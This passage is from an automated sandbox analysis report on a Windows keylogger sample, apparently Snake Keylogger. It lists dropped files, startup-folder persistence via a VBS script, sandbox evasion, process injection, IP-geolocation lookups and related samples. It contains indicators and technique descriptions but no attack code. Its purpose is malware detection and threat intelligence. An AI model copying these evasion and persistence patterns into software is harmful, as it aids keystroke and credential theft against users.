                  Source: Yara matchFile source: 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00906283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00906283
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00906747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00906747
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECEFE90 socket,SetHandleInformation,setsockopt,getaddrinfo,htons,inet_addr,htonl,htonl,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,5_2_00007FF75ECEFE90
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECEF930 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,5_2_00007FF75ECEF930

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		3
                  Native API                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		21
                  Input Capture                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol21
                  Input Capture                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts                  		2
                  Valid Accounts                  		2
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS136
                  System Information Discovery                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script213
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets341
                  Security Software Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder                  		2
                  Valid Accounts                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt213
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587675 Sample: 8kDIr4ZdNj.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 54 reallyfreegeoip.org 2->54 56 checkip.dyndns.org 2->56 58 checkip.dyndns.com 2->58 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Multi AV Scanner detection for submitted file 2->68 72 7 other signatures 2->72 11 8kDIr4ZdNj.exe 6 2->11         started        15 wscript.exe 1 2->15         started        17 notepad.exe 5 2->17         started        signatures3 70 Tries to detect the country of the analysis system (by using the IP) 54->70 process4 file5 52 C:\Users\user\AppData\Local\...\lecheries.exe, PE32 11->52 dropped 88 Binary is likely a compiled AutoIt script file 11->88 90 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->90 19 lecheries.exe 3 11->19         started        92 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->92 23 lecheries.exe 2 15->23         started        signatures6 process7 file8 46 C:\Users\user\AppData\...\lecheries.vbs, data 19->46 dropped 74 Multi AV Scanner detection for dropped file 19->74 76 Binary is likely a compiled AutoIt script file 19->76 78 Machine Learning detection for dropped file 19->78 86 2 other signatures 19->86 25 RegSvcs.exe 5 19->25         started        80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->80 82 Writes to foreign memory regions 23->82 84 Maps a DLL or memory area into another process 23->84 28 RegSvcs.exe 2 23->28         started        signatures9 process10 file11 48 C:\Users\user\AppData\...mbeddedExe2.exe, PE32 25->48 dropped 50 C:\Users\user\AppData\...mbeddedExe1.exe, PE32+ 25->50 dropped 30 EmbeddedExe2.exe 15 4 25->30         started        34 EmbeddedExe1.exe 25->34         started        36 conhost.exe 25->36         started        38 conhost.exe 28->38         started        process12 dnsIp13 60 checkip.dyndns.com 193.122.6.168, 49710, 49714, 49726 ORACLE-BMC-31898US United States 30->60 62 reallyfreegeoip.org 104.21.16.1, 443, 49711, 49713 CLOUDFLARENETUS United States 30->62 94 Antivirus detection for dropped file 30->94 96 Machine Learning detection for dropped file 30->96 40 cmd.exe 1 30->40         started        signatures14 process15 process16 42 conhost.exe 40->42         started        44 choice.exe 1 40->44         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  8kDIr4ZdNj.exe70%VirustotalBrowse
                  8kDIr4ZdNj.exe66%ReversingLabsWin32.Exploit.SnakeKeylogger
                  8kDIr4ZdNj.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe100%AviraTR/ATRAPS.Gen
                  C:\Users\user\AppData\Local\konked\lecheries.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\konked\lecheries.exe66%ReversingLabsWin32.Exploit.SnakeKeylogger

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.16.1
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		193.122.6.168
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          		high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tlecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                              		high
                              https://sectigo.com/CPS0lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                		high
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ylecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                  		high
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                    		high
                                    http://ocsp.sectigo.com0lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                      		high
                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe1.exe, EmbeddedExe1.exe, 00000005.00000000.2180190361.00007FF75ED9A000.00000002.00000001.01000000.00000007.sdmp, EmbeddedExe1.exe, 00000005.00000002.3395994788.00007FF75ED9A000.00000002.00000001.01000000.00000007.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                        		high
                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                          		high
                                          http://checkip.dyndns.org/qlecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe2.exe.3.drfalse
                                            		high
                                            https://reallyfreegeoip.org/xml/8.46.123.189$EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://reallyfreegeoip.orgEmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                                  		high
                                                  https://reallyfreegeoip.orgEmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgEmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000318A000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.microsoft.EmbeddedExe2.exe, 00000006.00000002.2310531102.000000000677A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.comEmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameEmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.chiark.greenend.org.uk/~sgtatham/putty/0lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                                                		high
                                                                https://reallyfreegeoip.org/xml/lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe2.exe.3.drfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.16.1
                                                                  		reallyfreegeoip.orgUnited States
                                                                  		13335CLOUDFLARENETUSfalse
                                                                  193.122.6.168
                                                                  		checkip.dyndns.comUnited States
                                                                  		31898ORACLE-BMC-31898USfalse

                                                                  General Information

                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1587675
                                                                  Start date and time:2025-01-10 16:45:52 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 51s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:22
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:8kDIr4ZdNj.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:d746bf8ebc1bc19872aafe6329fd3865332165c7ef477901e5cdf76e88e9931f.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.expl.evad.winEXE@22/15@2/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 57.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 89%
                                                                  • Number of executed functions: 60
                                                                  • Number of non-executed functions: 282
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target EmbeddedExe2.exe, PID 6968 because it is empty
                                                                  • Execution Graph export aborted for target RegSvcs.exe, PID 2300 because it is empty
                                                                  • Execution Graph export aborted for target RegSvcs.exe, PID 3496 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  10:46:54API Interceptor75x Sleep call for process: EmbeddedExe2.exe modified
                                                                  16:46:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs
                                                                  16:47:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                  193.122.6.1684iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                  • checkip.dyndns.org/
                                                                  PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  checkip.dyndns.comtx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 158.101.44.242
                                                                  New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 132.226.247.73
                                                                  4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.122.130.0
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  reallyfreegeoip.orgtx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.32.1
                                                                  New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.64.1
                                                                  4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.96.1
                                                                  ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • 104.21.112.1
                                                                  B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.32.1
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.80.1
                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.80.1
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.48.1
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.96.1

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ORACLE-BMC-31898US2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 158.101.44.242
                                                                  tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 158.101.44.242
                                                                  4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.122.130.0
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.6.168
